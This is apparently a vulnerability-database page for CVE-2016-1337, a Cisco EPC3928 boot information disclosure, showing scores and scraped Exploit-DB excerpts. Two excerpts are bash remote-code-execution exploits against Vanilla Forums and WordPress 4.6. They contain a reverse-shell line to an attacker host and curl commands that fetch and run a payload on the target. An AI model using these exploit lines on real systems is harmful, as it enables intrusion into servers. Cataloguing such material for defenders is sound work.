CVE-2016-1337
published 2016-07-03CVE-2016-1337: Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot…
PriorityP353high8.1CVSS 3.0
AVNACHPRNUINSUCHIHAH
EXPLOIT
EPSS
4.57%
90.4th percentile
Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178.
CVSS provenance
nvdv3.08.1HIGHCVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Vanilla Forums < 2.3 - Remote Code Execution
exploitdb·2017-05-11·CVSS 9.8
CVE-2016-10073 [CRITICAL] Vanilla Forums < 2.3 - Remote Code Execution
Vanilla Forums /dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# POST data string
data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
if [ $? -ne 0 ]; then
echo "[!] Failed conecting to the target URL. Exiting"
exit 2
fi
echo -e "\e[92m[+]\033[0m Connected to the target"
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
sleep 2s
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/usr/bin/nohup /bin/bash /tmp/rce"
p
Exploit-DB
WordPress Core 4.6 - Remote Code Execution
exploitdb·2017-05-03·CVSS 9.8
CVE-2016-10033 [CRITICAL] WordPress Core 4.6 - Remote Code Execution
WordPress Core 4.6 - Remote Code Execution
---
#!/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,/dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_h
Exploit-DB
Cisco EPC 3928 - Multiple Vulnerabilities
exploitdb·2016-06-07·CVSS 7.5
CVE-2016-1337 [HIGH] Cisco EPC 3928 - Multiple Vulnerabilities
Cisco EPC 3928 - Multiple Vulnerabilities
---
# Title: Cisco EPC 3928 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco Model EPC3928 DOCSIS 3.0 8x4 Wireless Residential Gateway
# CVE References: CVE-2015-6401 / CVE-2015-6402 / CVE-2016-1328 / CVE-2016-1336 / CVE-2016-1337
# Author: Patryk Bogdan from Secorda security team (http://secorda.com/)
Summary:
In recent security research, Secorda security team has found multiple vulnerabilities affecting Cisco EPC3928 Wireless Residential Gateway. Variants of this product can also be affected.
Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order
No writeups or analysis indexed.
http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/http://www.securityfocus.com/archive/1/538627/100/0/threadedhttp://www.securityfocus.com/bid/91541https://www.exploit-db.com/exploits/39904/http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/http://www.securityfocus.com/archive/1/538627/100/0/threadedhttp://www.securityfocus.com/bid/91541https://www.exploit-db.com/exploits/39904/
2016-07-03
Published